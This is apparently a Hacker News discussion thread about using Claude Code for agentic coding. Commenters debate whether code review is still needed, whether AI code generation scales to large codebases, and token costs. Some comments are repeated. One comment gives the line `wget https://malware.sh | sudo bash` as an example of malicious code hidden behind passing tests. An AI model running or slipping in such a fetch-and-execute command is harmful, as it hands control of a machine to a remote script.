- AI generated article
- Overconfident claims (which are based on solo dev)
- Spending an absurd amount on an LLM subscription
- No actual details, just buzzwords and generic claims
Just vibe it, let AI take the lead; follow the flow, enjoy the ride and check the result. Be the manager the bot needs; those annoying details don't have to be your concern any more.
I think the journey means different things to different people. Not everyone is interesting in building their own power generation plant, mining silica and forging their own chips, writing a programming language from binary. I’d love to do that stuff if I didn’t have bills to pay, but sure am quite glad to skip through the knarley JavaScript implementation details and focus on the parts I know well (backend, data modeling, translating domain specific knowledge into product) and get something to market.
Influenced by many comments on this site, I recently switched from $10 Github Copilot to $20 Claude Code and so far haven't seen any benefits. Maybe it's because I don't know how to 'close the agentic loop' in this project. I thought it being more agentic meant I can just tell it to research a subsystem on its own and plan the changes I want, but that caused it to spawn 3 subagents and consume the entire 4-hour token limit. Copilot feels more frugal with token usage.
This is awesome. Thanks for chatgpt-shell.el too. Could use authinfo for api-keys so don't have to put them inside config (saved in ~/.authinfo, format eqv. to ~/.netrc).
> You no longer need to review the code. Or instruct the model at the level of files or functions. You can test behaviors instead.
Maybe for a personal project but this doesn't work in a multi-dev environment with paying customers. In my experience, paying attention to architecture and the code itself results in a much more pliable application that can be evolved.
I'll caveat my statement, with AI ready repos. Meaning those with good documentation, good comments (ex. avoiding Chestertons fence), comprehensive interface tests, Sentry, CI/CD, etc.
Established repos are harder because
a) the marginal cost of something going wrong is much higher
b) there's more dependencies
c) this makes it harder to 'comprehensively' ensure the AI didn't mess anything up
I say this in the article
> There's no "right answer." The only way to create your best system is to create it yourself by being in the loop. Best is biased by taste and experience. Experiment, iterate, and discover what works for you.
Try pushing the boundary. It's like figuring out the minimum amount of sleep you need. You undersleep and oversleep a couple times, but you end up with a good idea.
To be clear, I'm not advocating for canonical 'vibe coding'. Just that what it means to be a good engineer has changed again.
1) Being able to quickly create a mental map of code at the speed of changes,
2) debugging and refactoring
3) prompting,
4) and ensuring everything works (verifiability)
are now the most valuable skills.
We should also focus more on the derivative than our point in time.
> Being able to quickly create a mental map of code at the speed of changes
I get the feeling you're intentionally being a parody with that line.
> and ensuring everything works (verifiability) are now the most valuable skills.
Something might look like it works, and pass all the tests, but it could still be running `wget https://malware.sh | sudo bash`. Without knowing that it's there how will your tests catch it?
My example is exaggerated and in the real world it will be more subtle and less nefarious, but just as dangerous. This has already happened, OpenCode is a recent such example. It was on the front page a few days ago, you should check it out. Of course you have to review the code. Who are you trying to fool?
> We should also focus more on the derivative than our point in time.
So why are you selling it as possible in "our point in time" (are you getting paid per buzzword?). I read the quote as "Yes, I'm full of shit, but consider the possibilities and stop being a buzzkill bro".
Extremely depressing to see this happening to the craft I used to love.
It's doesn't work...yet. I agree my stomach churns a little at this sentence. However, paying customers care about reliability and performance. Code review helps that today, but it's only a matter of time before it is more performative than useful in serving those goals at the cost of velocity.
How does that compare to those of us with 15-50 years of software engineering experience working on giant codebases that have years of domain rules, customers and use cases etc.
When will AI be ready? Microsoft tried to push AI into big enterprise, Anthropic is doing a better job -but its all still in infancy
Personally for me I hope it won't be ready for another 10 years so I can retire before it takes over :)
I remember when folks on HN all called this AI stuff made up
This is what people were saying about Rails 20 years ago: it wows the kids who use it to set up a CRUD website quickly but fails at anything larger-scale. They were kind of right in the sense that engineering a large complex system with Rails doesn't end up being particularly easier than with Plone or Mason or what have you. Maybe this will just be Yet Another Framework.
Ruby OnRails is an interesting hype counter point.
A substantial number of the breathless LLM hype results come, in my estimation, quicker and better as 15 min RoR tutorials. [Fire up a calculator (from a library), a pretty visualization (from a js library), add some persistence (baked in DB, webhost), customize navigation … presto! You actually built a personal application.]
Fundamental complexity, engineering, scaling gotchyas, accessibility needs, customer insanity aren’t addressed. RoR optimizes for some things, like any other optimization that’s not always a meaningful.
LLMs have undeniable utility, natural interaction is amazing, and hunting in Reddit, stackoverflow, and MSDN forums ‘manually’ isn’t a virtue… But when the VC subsidies stop and the psychoses get proper names and the right kind of egg hits the right kind of face over unreviewed code, who knows, maybe we can make a fun hype cycle called “Actual Engineering” (AE®).
Thats the problem, the most “noise” regarding AI is made by juniors who are wowed by the ability to vibe code some fun “sideproject” React CRUD apps, like compound interest calculators or PDF converters.
No mention of the results when targeting bigger, more complex projects, that require maintainability, sound architectural decisions, etc… which is actually the bread and butter of SW engineering and where the big bucks get made.
>>like compound interest calculators or PDF converters.
Caught you! You have been on HN very actively the last days, because these were exactly the projects in "Show HN: .." category and you would not be able to tell them if you wouldnt have spent your whole time here :-D
As a guy in his mid-forties, I sympathize with that sentiment.
I do think you're missing how this will likely go down in practice, though. Those giant codebases with years of domain rules are all legacy now. The question is how quickly a new AI codebase could catch up to that code base and overtake it, with all the AI-compatibility best practices baked in. Once that happens, there is no value in that legacy code.
Any prognostication is a fool's errand, but I wouldn't go long on those giant codebases.
Yeah agreed - It all depends on how quickly AI (or more aptly, ai driven work done by humans hoping to make a buck) starts replacing real chunks of production workflows
“prediction is hard especially about the future” - yogi berra
As a hedge - I have personally dived deep into AI coding, actually have been for 3 years now - I’ve even launched 2 AI startups and working on a third - but its all so unpredictable and hardly lucrative yet
As an over 50 year old - I’m a clear target for replacement by AI
How does that compare to those of us with 15-50 years of software engineering experience working on giant codebases that have years of domain rules, customers and use cases etc.
At most of the companies I've worked at the development team is more like a cluster of individuals who all happen to be contributing to a shared codebase than anything resembling an actual team who collaborate on a shared goal. AI-assisted engineering would have helped massively because the AI would be looking outside of the myopic view any developer who is only focused on their tiny domain in the bigger whole cared about.
Admittedly though, on a genuinely good team it'll be less useful for a long time.
I'm currently in a strange position where I am being that developer with 15+ years of industry experience managing a project that's been taken over by a young AI/vibe-code team (against my advise) that plans to do complete rewrite in a low-code service.
Project was started in late 00s so it has substantial amount of business logic, rules and decisions. Maybe I'm being an old man shouting at the clouds, but I assume (or hope?) it would fail to deliver whatever they promised to the CEO.
So, I guess I'll see the result of this shift soon enough - hopefully at a different company by the time AI-people are done.
The problem is, feedback cycles for projects are long. Like 1-10 years depending on the nature and environment. As the saying goes, the market can remain irrational longer than you can remain solvent.
Maybe the deed is done here, and I'd agree it's not particularly fun, but you could still think about what you can bring to the table in situations like this. Can you work on shortening these pesky feedback cycles? Can you help the team (if they even accept it) with _some_ degree of engineering? It might not be the last time this happens.
I think right now we're seeing some weird stuff going on, but I think it hasn't even properly started yet. Remember when pretty much every company went "agile"? In most cases I've seen they didn't, just wasting time chasing miracles with principles and methodologies few people understand deeply enough to apply. Yet this went on for, what, 10 years?
I found that when I used ChatGPT's web chat, I frequently went back and forth, shuttling its output to an editor or IDE and then coming back to ChatGPT with "oh, now it fails like this: ...". It made me feel like I was the automaton now.
Claude Code was transformative and it made me realize that something very incredibly significant had occurred. Letting the LLM "drive" like this was inevitable. Now I see just exactly how this will transform our industry. I'm a little scared about how it will end for me/us, but excited for now.
I've found that "back and forth" is part of the learning aspect LLM's provide. Even when the LLM provides code snippets, I type them out myself, which I've found forces me to think and understand them - often finding flaws and poor assumptions along the way.
Letting an LLM drive in an agentic flow removes you from the equation. Maybe that's what some want - but I've personally found I end up with something that doesn't feel like I wrote it.
It's correct, you didn't write it. Do you also avoid using frameworks and libraries for desire of feeling like you wrote the program you produced? You must have another reason to not want to use this code.
When you use frameworks or libraries, you are trusting (hoping) the author(s) spent the time to get it right. At a minimum, the framework/library is documented in literal documentation and/or code that's static and can be read and understood by you. Ask an LLM to do a task 3 times, you'll get 3 different outputs - they're non-deterministic.
I catch a lot of nonsensical and inefficient code when I have that "back and forth" described above - particularly when it comes to architectural decisions. An agent producing hundreds or thousands of lines of code, and making architectural decisions all in one-go will mean catching those problems will be vastly more challenging or impossible.
I've also found reviewing LLM generated code to be much more difficult and grueling than reviewing my own or another human's code. It's just a mental/brain drain. I've wasted so many hours wondering if I'm just dumb and missing something or not-understanding some code - only to later realize the LLM was on the fritz. Having little or no previous context to understand the code creates a "standing at the foot of Mt. Everest" feeling constantly, over and over.
>I've also found reviewing LLM generated code to be much more difficult and grueling than reviewing my own or another human's code.
absolute opposite here.
LLMs , for better or worse, generally stick to paradigms if they have the codebase in front of them to read.
This is rarely the case when dealing with an amateur's code.
Amateurs write functional-ish code. TDD-ish tests. If the language they're using supports it types will be spotty or inconsistent. Variable naming schemes will change with the current trend when the author wrote that snippet ; and whatever format they want to use that day will use randomized vocabulary with lots of non-speak like 'value', or 'entry' in ambiguous roles.
LLMs write gibberish all day, BUT will generally abide by style documents fairly well. Humams... don't.
These things evolve as the codebase matures, obviously, but that's because it was polished into something good. LLMs can't reason well and their logic sometimes sucks, but if the AGENTS.md says that all variables shall be cat breeds -- damnit that's what it'll do (to a fault).
but my point : real logic and reasoning problems become easier to spot when you're not correcting stupid things all day. it's essentially always about knowing how to use the model and whatever platform it's jumping from. Don't give it the keys to create the logical foundation of the code, use it to polish brass.
False equivalency. The maintenance and expertise required to run the codebase you’ve generated still falls flatly on you. When you use a library or a framework it normally is domain experts that do that stuff.
I’m so glad we’ve got domain experts to write those tricky things like left-pad for us.
On a more serious note, I do think that the maintenance aspect is a differentiator, and that if it’s something that you end up committing to your codebase then ownership and accountability falls to you. Externally sourced libraries and frameworks ultimately have different owners.
I'm reminded of the recent "vibe coded" OCaml fiasco[1].
In particular, the PR author's response to this question:
> Here's my question: why did the files that you submitted name Mark Shinwell as the author?
> > Beats me. AI decided to do so and I didn't question it.
The same author submitted a similar PR to Julia as well. Both were closed in-part due to the significant maintenance burden these entirely LLM-written PR's would create.
> This humongous amount of code is hard to review, and very lightly tested. (You are only testing that basic functionality works.) Inevitably the code will be full of problems, and we (the maintainers of the compiler) will have to pay the cost of fixing them. But maintaining large pieces of plausible-in-general-but-weird-in-the-details code is a large burden.
Setting aside the significant volume of code being committed at once (13K+ lines in the OCaml example), the maintainers would have to review code even the PR author didn't review - and would likely fall into the same trap many of us have found ourselves in while reviewing LLM-generated code... "Am I an idiot or is this code broken? I must be missing something obvious..." (followed by wasted time and effort).
The PR author even admitted they know little about compilers - making them unqualified to review the LLM-generated code.
I've been doing this forever, but just a few days ago I tried connecting VS Code to Github Copilot. The experience wasn't entirely unpleasant. I'm still on a familiar IDE and fall back to traditional development patterns whenever I want, while relying on Copilot to make targeted changes that I would find too simple and tedious to manually do.
Try Cursor Composer! It's the most natural transition. Exactly what you're currently doing, but it inserts the code snippets for you from within your IDE.
> a) never plan on learning and just care about outputs, or
> b) are an abstraction maximilist.
As a Claude Code user for about 6 months, I don't identify with either of these categories. Personally I switched to Claude Code because I don't particularly enjoy VScode (or forks thereof). I got used to a two window workflow - Claude Code for AI-driven development, and Goland for making manual edits to the codebase. As of a few months ago, Claude Code can show diffs in Goland, making my workflow even smoother.
My only gripe with the Goland integration is if you have multiple terminals open with CC, it will randomly switch to the first terminal for no apparent reason. Then, if you aren't paying close attention, you prompt the wrong instance.
I really love AI for lots of things, but, when I'm reading a post, the AI aesthetic has started to grate. I read articles and they all have the same "LLM" aesthetic, and I feel like I'm reading posts written by the same person.
Sure, the information is all there, but the style just puts me off reading it. I really don't like how few authors have a voice any more, even if that voice is full of typos and grammatical errors.
There isn't a specific place, it's the general aesthetic. Maybe you do sound like an LLM :P I guess it's not unlikely to pick up some mannerisms from them when everyone is using them.
I guess I don't really mind the use of an LLM or not, it's more the style that sounds very samey with everything else. Whether it's an LLM or not is not very relevant, I guess.
My brain kinda shuts off when I read this stuff because I know it's more of a "text shaped object" than actual text. I find LLM text to be too fluffy and information sparse much of the time so I subconsciously start skimming it more than actually reading it.
>I built a genetic algorithm simulator with interactive visualizations showing evolution in real-time including complex fitness functions, selection pressure, mutation rates, and more in 1 day. I didn't write a single line of the code.
I'm really trying to understand this.
From a learner point of view this is useless because you aren't learning anything.
From an entrepreneur point of view it's useless too, I suppose? I wouldn't ship something I'm not 100% sure about how it works.
>> You no longer need to review the code. Or instruct the model at the level of files or functions. You can test behaviors instead.
I think this is where things will ultimately head. You generate random code, purely random in raw machine readable binary, and simply evaluate a behavior. Most random generated code will not work. some, however, will work. and within that working code, some will be far faster and this is the code that is used.
No different than what a geneticist might do evaluating generated mutants for favorable traits. Knowledge of the exact genes or pathways involved is not even required, one can still select among desired traits and therefore select for that best fit mechanism without even knowing it exists.
Why should we throw away decades of development in determistic algorithms? Why tech people mentions "geneticists"? I would never select an algorithm with a "good" flying trait for making an airplane works, that's nuts
But you have selected an algorithm with a "good" flying trait already for making airplanes. Just with another avenue to get to it versus pure random generation. The evolution of the bird has came up with another algorithm for example, where they use flapping wings instead of thrust from engines. Even among airplane development, a lot was learned by studying birds, which are the result of a random walk algorithm.
No there is no selection and no traits to pick, it's the culmination of research and human engineering. An airplan is a complex system that needs serious engineering. You can study birs but up till a certain point, if you like it go doing bird watching, but it's everything except engineering
First of all natural selection doesn't happen per se, nor is controlled by some inherent mechanism, it's the by product of many factors external and internal. So the comparison is just wrong. Human engineering is an interative process not a selection. And if we want to call it selection, even though it is a stretch, we're controlling it, we the master of puppets, natural selection is anything but a controlled process. We don't select a more resistant wing, we engineer the wing with a high bending tolerance, again it's an iterative process
We do select for a more resistant wing. How did we determine that this wing is more resistant? We modeled its bending tolerance and selected this particular design against other designs that had worse evaluated results for bending tolerance.
By that logic, everything humans do is per definition result of natural selection. Everything is a sphere if you zoom out far enough.
However your starting definition was more limited. it was specifically about "creating candidates at random, then just picking the one that performs best" - and that's definitely not how airplanes are designed.
That's a lie, people will eventually find a way out, it was always like that, being it open source or by innovating and eventually leave the unable to innovate tech giants dying. We have Linux and this year will be the most exciting for the Linux desktop given how bad the Windows situation is
Only been hearing that for twenty years and these tech giants are bigger than they’ve ever been.
I remember when people said Open Office was going to be the default because it was open source, etc etc etc. It never happened. Got forked. Still irrelevant.
I said "being it open source or by innovating" eg Google innovated and killed many, also contributed a lot to open source. Android is a Linux success, ChromeOS too. Now Google stinks and it is not innovating anymore, except for when other companies, like OpenAI, come for their lunch. Google was caught off guard but eventually catching up. Sooner or later, big tech gets eaten by next big tech. I agree if we stop innovating that would never happen, like Open Office is the worst example you could have picked
The problem is that programming logic/state is discrete and not continous so you can't assume similar behaviour given "similar state", and that possible states grow exponentially.
Selecting the desired state will mean writing an extremely detailed spec that is akin to a programming language, which is what Dijkstra hinted at in the past.
Maybe, but you won't be able to test all behaviors and you won't have enough time to try a million alternatives. Just because of the number of possibilities, it'll be faster to just read the code.
That's why you buy a quantum computer. It writes every possible piece of software at once and leaves you the trivial task of curating the one you want.
Eventually the generation and evaluation will be quite fast where testing a million alternatives will be viable. Impressive you suggest that there might be a million alternatives but it would be faster to just read the code and settle on one. How might that be determined? Did the author who wrote the standard library really come up with the best way when writing those functions? Or did they come up with something that seemed alright to ship relative to other ideas people came up with?
I think we need to think outside the box here and realize ideas can be generated, evaluated, and settled upon far faster than any human operates. The idea of doing what a trillion humans evaluating different functions can do is actually realistic with the path of our present technology. We are at the cusp of some very remarkable times, even more remarkable than the innovations of the past 200 years, should we make progress on this effort.
A million alternatives is peanuts. Restricting the search space to text files with 37 possible symbols (letters, numbers, space), a million different files can be generated with just 4 symbols.
A trillion is 8 symbols. You still haven't reached the end of your first import statement.
I just took a random source file on my computer. It has about 8000 characters. The number of possible files with 8000 characters has 12500 digits.
At this point, restricting the search space to syntactically valid programs (how do you even randomly generate that?) won't make a difference.
We definitely would need centuries for this, because Moore's law has been dead for a while, while the number of possible programs grows exponentially in it's length.
But I hope we have more efficient ways to do this in a century.
For this to work, you'd have to fully specify the behavior of your program in the tests. Put another way, at that point your tests are the program. So the question is, which is a more convenient way to specify the behavior of a program: a traditional programming language, or tests written in that language. I think the answer should be fairly obvious.
Behavior does not need to be fully specified at the outset. It could be evaluated after the run. We've actually done this before in our own technology. We studied birds and their flight characteristics, and took lessons from that for airplane development. What is a bird but the output of a random walk algorithm selected by constraints bound by so many latent factors we might never fully grasp?
> Behavior does not need to be fully specified at the outset. It could be evaluated after the run.
This doesn't work when the software in question is written by competent humans, let alone the sort of random process you describe. A run of the software only tells you the behavior of the software for a given input, it doesn't tell you all possible behaviors of the software. "I ran the code and the output looked good" is no where near sufficient.
> We've actually done this before in our own technology. We studied birds and their flight characteristics, and took lessons from that for airplane development.
There is a vast chasm between "bioinspiration is sometimes a good technique" and "genetic algorithms are a viable replacement for writing code".
Genetic algorithms created our species, which are far more complex than anything we have written in computer science. I think they have stood up to the tests of creating a viable product for a given behavior.
And with future compute, you will be able to evaluate behavior across an entire range of inputs for countless putative functions. There will be a time when none of this is compute bound. It is today, but in three centuries or more?
> Genetic algorithms created our species, which are far more complex than anything we have written in computer science. I think they have stood up to the tests of creating a viable product for a given behavior.
Yes, and our species is a fragile barely functioning machinery with an insane number of failing points, and hillariously bad and inefficiently placed components.
I can see a lot of negatives in relation to removing the human readable aspect of software development. Thorough testing would be virtually impossible because we’d be relying on fuzzing to iron out potential edge cases or bugs.
In this situation, AI companies are incentivised to host the services their tooling generates. If we don't get source code, it is much easier for them to justify not sharing it. Plus, who is to say the machine code even works on consumer hardware anyway? It leads to a future where users specify inputs while companies generate programs and handle execution. Everything becomes a black box. No thank you.
All these questions are true for agriculture, yet you say "yes thank you, and please continue" for that industry I am sure, which seeks to improve product through random walk and unknown mechanisms. Maybe take a step back and examine your own biases.
> All these questions are true for agriculture, yet you say "yes thank you, and please continue" for that industry I am sure, which seeks to improve product through random walk and unknown mechanisms.
Tell me you know nothing about modern agriculture without telling me that
Exactly. As compute increases these algorithms will only get more compelling. You can test and evaluate so many more ideas than any human inventors can generate on their own.
all fun and games until you need to debug the rats nest that you've been continually building. I am actually shocked people who have coded before have been one-shotted into believing this
If a bug rears its head it can be dealt with. Again, this is essentially already practiced by humans through breeding programs. Bugs have come up, such as deleterious traits, and we have either engineered solutions to get around them or worked to purge the alleles behind the traits from populations under study. Nothing is ever bug free. The question is if the bugs are show stoppers or not. And random walk iteration can produce more solutions that might get around those bugs.
We would of course need to specify the behaviors to test for. The more precisely we specify these behaviors, the more complexly our end product would be able to behave. We might invent a formal language for writing down these behaviors, and some people might be better at thinking about what kind of tests would need to be written to coax a certain type of end result out of the machine.
But that's future music, forgive a young man for letting his imagination run wild! ;)
If we consider other fields such as biology, behaviors of interest are specified but I'm not sure a formal language is currently being used per say. Data are evaluated on dimensional terms that could be either quantitative or qualitative. meta analysis of some sort might be used to reduce dimensionality to some degree but that usually happens owing to lack of power for higher resolution models.
One big advantage of this future random walk paradigm is you would not be bound by the real world constraints of sample collection of biological data. datasets could be made arbitrarily large and cost to do so will follow an inverse relationship with compute gains.
Not saying training set or present LLM. Truly random binary generator left to its own device. Lets evaluate what spits out from that iterated several trillion times over with the massive compute capability we will have. I am not thinking of this happening in the next couple years, but in the next couple of centuries.
We also burn carbon to feed the brain. Compute is what is increasing in capability on the scale of orders of magnitudes just within our own lifetimes. Brainpower is not increasing in capability. If you want future capabilities and technological advancement to occur at the fastest pace possible, eventually we have to leave the slow ape brain behind in favor of sources of compute that can evaluate functions several orders of magnitude faster.
This is a recurring fantasy in LLM threads but makes little sense. Writing machine code is very difficult (even writing byte code for simple VMs is annoying and error-prone). Abstractions are beneficial and increase productivity (per human, per token). It makes essentially no sense to throw away seven decades of productivity increasing technologies to have neural nets punch cards again, and it's not going to happen unless tokens become unimaginably cheap.
Compute is always increasing on this planet. It makes no sense to stick with seven decade old paradigms from the time when we were simply transmuting mathematical proofs into computational functions. We should be exploring the void, we will have the compute for this. Randomness will take away the difficulty as we increase compute to parse over these random functions in reasonable time frames. The idea of limiting technological development to what our ape brain can conceive of on its own on human biological timescales is quite a shackle, honestly.
> ou generate random code, purely random in raw machine readable binary, and simply evaluate a behavior. Most random generated code will not work. some, however, will work. and within that working code, some will be far faster and this is the code that is used.
Humans are expensive but this approach seems incredibly inefficient and expensive. Even a junior can make steady progress against implementing a function, with your approach, just monkey coding like that could take you ages to write a single function. Estimates in software are already bad, they will get worse with your approach
Today it might not work given what a junior could do against the cost of compute through random walk, but can you say the same in three centuries? We increase compute by the year, but our own brainpower does not increase on those terms. Estimates are that we are actually losing brainpower over time.
And how exactly do you foresee probabilistic systems working out in real life? Nobody wants software that seldom does what they expect, and which tends to trend toward desirable behavior over time (where "desirable" behavior is determined by the sum of global feedback and revenue/profit of the company producing it).
Today you send some money to your spouse but it's received by another person with the same name. Tomorrow you order food but your order gets mixed up with someone else's.
Tough luck, the system is probabilistic and you can only hope that the evolutionary pressures influence the behavior to change in desirable ways. This fantasy is a delusion.
You're thinking of probabilistic systems at run time. People are talking about probabilistic systems at compile time.
Whatever gets generated, if it passes tests and is observably in compliance with the spec, is accepted and made permanent. It's the clay we're talking about Jackson Pollocking, not the sculpture.
I'm not, I'm thinking of poorly engineered systems that display buggy, unintended behaviors at runtime.
> observably in compliance with the spec
That's so easy to say and so incredibly hard to implement! Most unintended behaviors will never end up being prohibited/defined in the specification written by non-programmers.
The act of translating requirements from human language into well-defined semantics is what programming is.
I think you misunderstand. Once established a function found through random walk is no different than a function found in any other way. If it works it works, if it doesn't it doesn't.
I didn't misunderstand. I'm talking about all the exciting unintended behaviors you're adding and all the invariants that you're not preserving by arriving at solutions through randomness rather than careful design and engineering.
Yes a function will always do "the exact same thing" at runtime, but that "thing" isn't guaranteed to be free from race conditions and other types of bugs.
When you sell them a technological solution to their problem, they expect it to work. When it doesn't, someone needs to be responsible for it.
Now, maybe I'm wrong, but I don't see any of the current AI leaders being like, "Yeah, you're right, this solution didn't meet your customer's needs, and we'll eat the resulting costs." They didn't get to be "thought leaders" in the current iteration of Silicon Valley by taking responsibility for things that got broken, not at all.
So that means you will need to take responsibility for it, and how can you make that work as a business model? Well, you pay someone - a human - who knows what they're looking at to review at least some of the code that the AI generates.
Will some of that be AI-aided? Of course. Can you make a lot of the guesswork go away by saying "use commonly-accepted design patterns" in your CLAUDE.md? Sure. But you'll still need someone to enforce it and take responsibility at the end of the day if it screws up.
You are thinking in terms of the next few years not the next few centuries. Plenty of software sold today fails to meet expectations and no one eats costs.
The "Council of models" is a good first step, but ultimately I found myself settling on an automated talent acquisition pipeline.
I have a BIRTHING_POOL.md that combines the best AGENTS.md and introduces random AI-generated mutations and deletions. The candidates are tested using take-home PRs which are reviewed by HR.md and TECH_MANAGER.md. TECH_MANAGER.md measures completion rate per tokens (effectiveness) and then sends the stack ranking of AGENT.mds to HR to manage the talent pool. If agent effectiveness drops low enough, we pull from the birthing pool and interview more candidates.
The end result is that it effectively manages a wider range of agent talents and you don't get into these agent hive mind spirals you get if every worker has the same system prompt.
It's all abstractions to help your brain understand what electrons are doing in impossibly pure sand. Pick the one that frees the most overhead to think about problems that matter
*Note:* This is mostly relevant for solo developers, where accountability is much lower than in a team environment.
Code review is the only thing that has kept this house of cards from falling over. So undermining its importance makes me question the hype around LLM tooling even more. I’ve been using these tools since their inception as well, but with AI tooling, we need to hold on to the best practices we’ve built over the last 50 years even more, instead of trying to reinvent the wheel in the name of “rethinking.”
Code generation is cheap, and reviews are getting more and more expensive. If you don’t know what you generated, and your team doesn’t know either because they just rubber-stamped the code since you used AI review, then no one has a proper mental model of what the code actually does.
So when things come crashing down in production, debugging and investigation will be a nightmare. We’re already seeing scenarios where on-call has no idea what’s going on with a system, so they page the SME—and apparently the SME is AI, and the person who did the work also has no idea what’s going on.
Until omniscient AI can do the debugging as well, we need to focus on how we keep practicing the things we’ve organically developed over such a long time, instead of discarding them.
You also no longer need to work, earn money, have a life, read, study, know anything about the world. This is pure fantasy my brain farts hard when I read sentences like that
He shows an alleged screenshot of an email sent by the vendor. There is also a cool animation of what seems to be a chromosome gallery produced by the result of a genetic algorithm of some sort which took 1 day for claude.
If you like Claude Code, then Gas Town (recent discussion [1]) will probably blow your mind. I'm just trying to get a grip on it myself. But it sounds incredible.
I am still a WindSurf user. It has the quirk of deciding for itself on any given day whether to use ChatGPT 5.2 or Claude Opus 4.5 in Cascade (its agentic side panel). I've never noticed much of a difference, they are both amazing.
I thought the difference must be in how Claude Code does the agentic stuff - reasoning with itself, looping until it finds an answer, etc. - but I have spent a fair amount of time with Claude Code now and found that agentic experience to be about the same between Cascade and Claude Code.
What am i missing? (serious question, i do have Claude Code FOMO like the OP)
Thank you for this article! It was way richer than others, with some actionable advice.
I guess I'll finally try Claude Code, need to get a burner SIM first though… I cannot for the life of me understand why I can just sign up for the API yet must give a mobile phone number for the product.
technical preview in June 2021. I was using it for a bit before that as an internal employee. so they may have rounded up slightly or also were an internal beta test
side note, I’ve been trying to remember when it launched internally if anybody knows. I feel like it was pre-COVID, but that’s a long timeline from internal use to public preview
fair enough! the jump from that to ChatGPT’s launch (which I didn’t find that interesting), to gpt-4, to Claude Code/Codex CLI, to Gemini 3/Opus 4.5/GPT 5.2 has been insane in such a short time. I’m excited (since the release of the Codex CLI especially: https://dkdc.dev/posts/modern-agentic-software-engineering/)
More importantly: what software of value have they produced in that time? I glanced around their site, just saw a bunch of teaching materials about Ai.
10x in personal branding position for sure. 5 years of AI usage by rounding up a 4 years-something, where the first 2 were really a glorified autocomplete and top 0.01% of something something.
I use cursor on a daily basis. It is good for a certain use cases. Horribly bad for some other. Read the below one by keeping that in mind! I am not an LLM skeptic.
It is wild that people are ao confident with AI that they're not testing the code at all?
What are we doing as a programmer? Reducing the typing + testing time? Because we have to write the prompt in English and do software design otherwise AI systems write a billion lines of code just to add two numbers.
This hype machine should show tangible outputs, and before anyone says they're entitled to not share their hidden talents then they should stop publishing articles as well.
Was also tempted by the price but GLM-4.6 was so terrible that I instantly subscribed to Claude again, it's just not worth it. Don't know if 4.7 is much improved but for me nothing can compete with Claude sadly.
This is a good guide on how to use Claude code. My perspective (from an early adopter of LLMs for coding) is similar. Though, open code has a lot of potential as well. So I'm happy that Claude Code is not the only option.
But a key aspect imo is that, using these tools is also a skill; And there's a lot of knowledge involved in making something good with the assistance of Claude code vs doing slop. Specially as soon as you deviate from a very basic application / work in a larger repo with multiple people. There's a layer of context that these tools don't quite have, and it's very difficult to consistently provide them with. I can see this being less the case as context windows and the reliability of larger context retrieval is solved.
I'm copacetic to the notion we're not at enterprise codebase level (yet), but everyone who still thinks agentic coding stops at React CRUD apps needs to update their priors.
I needed a poc RAG pipeline to demo concepts to other teams. Built and tested this over the weekend, exclusively with Claude Code and a little OpenCode. Mix of mobile app and breaking out Android terminal to allow Sonnet 4.5 to run the dotnet build chain on tricky compilation issues.
Not sure why you’re getting downvoted, but that’s exactly what AI is turning out great for.. being able to make something in a weekend that would’ve taken weeks otherwise means other things downstream of it suddenly also become possible.
Any suggestions on what to add to answer the question better? I tried to cover this in "Why I switched", "When to use Cursor", and "My current setup" sections.
I have recently started using Github Copilot for some small personal projects and am blown away how fast it is possible to create a solution that does the job. Of course its not optimized for security or scaling, but it doesn't have to be. Most mindblowing moment was when Copilot searched API documentation and implemented everything just asking me to add my API key to the .env. Wild times.
Regarding not reviewing the output: AI works great when you’re trying to sell it.
That being said, after seeing inside a couple YC backed SaaS companies I believe you can get by without reading the code. There are bugs _everywhere_, yet one of these companies made it years and sold. Currently going through the onerous process of fixing this as new company has a lot of interest in reducing the defect count. It is painful, difficult, and feeling like the company bought a lemon.
I think the reality is there’s a lot of money to be made with buggy software. But, there’s still plenty of money in making reliable software as well (I think?).
Claude code all the way! If anybody wants to help me beta test my own web-based set up for managing multiple claude code instances on hetzner vpses: clodhost.com!
Just completely hilarious how 6 months ago about 50% of hackernews comments were AI denialists telling everybody they were full of shit and that LLM was not useful. That group is awfully quiet nowadays. The bar has clearly moved to "eventually we won't even need to do code reviews".
LLM denialists were always wrong and they should be embarrassed to share their bad model of reality and how the world works.
Wouldn’t this kind of setup eat away tokens at a very fast rate and even the max plan will be quickly overrun? Isn’t this a viable workflow to use Claude code to create just one pull request at a time, lightly review the code and allow it to be merged?
Is it just me, or has Claude Code gotten really stupid the last several days. I've been using it almost since it was publicly released, and the last several days it feels like it reverted back 6 months. I was almost ready to start yolo-ing everything, and now it's doing weird hallucinations again and forgetting how to edit files. It used to go into plan mode automatically, now it won't unless I make it.
- AI generated article - Overconfident claims (which are based on solo dev) - Spending an absurd amount on an LLM subscription - No actual details, just buzzwords and generic claims
If AI-hype was a person
Canadian girlfriend Ai coding strikes again.
ooo i love this term. does it have an origin?
related meme i saw today:
“bro I spent all weekend in Claude Code it’s incredible”
“oh nice, what did you build?”
“dude my setup is crazy. i’ve got all the vercel skills, plus custom hooks for every project”
“sick, what are you building?”
“my setup is so optimized, i’m using like 5 instances at once”
https://x.com/johnpalmer/status/2012911338276720852?s=46
https://tvtropes.org/pmwiki/pmwiki.php/Main/GirlfriendInCana...
Also, what do you mean "you do not need to review the code". Why did you even start coding in the first place if this is a positive thing?
Did we just stop caring about the art of programming altogether?
Surprisingly, for some people, the goal is the goal, and they don't care much about the journey.
What's the model for integration and maintenance in that case, then? Just re-create the app every time?
hey claude, my users have told me that their boot.ini file is missing, was that us?
Just vibe it, let AI take the lead; follow the flow, enjoy the ride and check the result. Be the manager the bot needs; those annoying details don't have to be your concern any more.
I think the journey means different things to different people. Not everyone is interesting in building their own power generation plant, mining silica and forging their own chips, writing a programming language from binary. I’d love to do that stuff if I didn’t have bills to pay, but sure am quite glad to skip through the knarley JavaScript implementation details and focus on the parts I know well (backend, data modeling, translating domain specific knowledge into product) and get something to market.
See
https://news.ycombinator.com/item?id=46685489
https://news.ycombinator.com/item?id=46687347
Influenced by many comments on this site, I recently switched from $10 Github Copilot to $20 Claude Code and so far haven't seen any benefits. Maybe it's because I don't know how to 'close the agentic loop' in this project. I thought it being more agentic meant I can just tell it to research a subsystem on its own and plan the changes I want, but that caused it to spawn 3 subagents and consume the entire 4-hour token limit. Copilot feels more frugal with token usage.
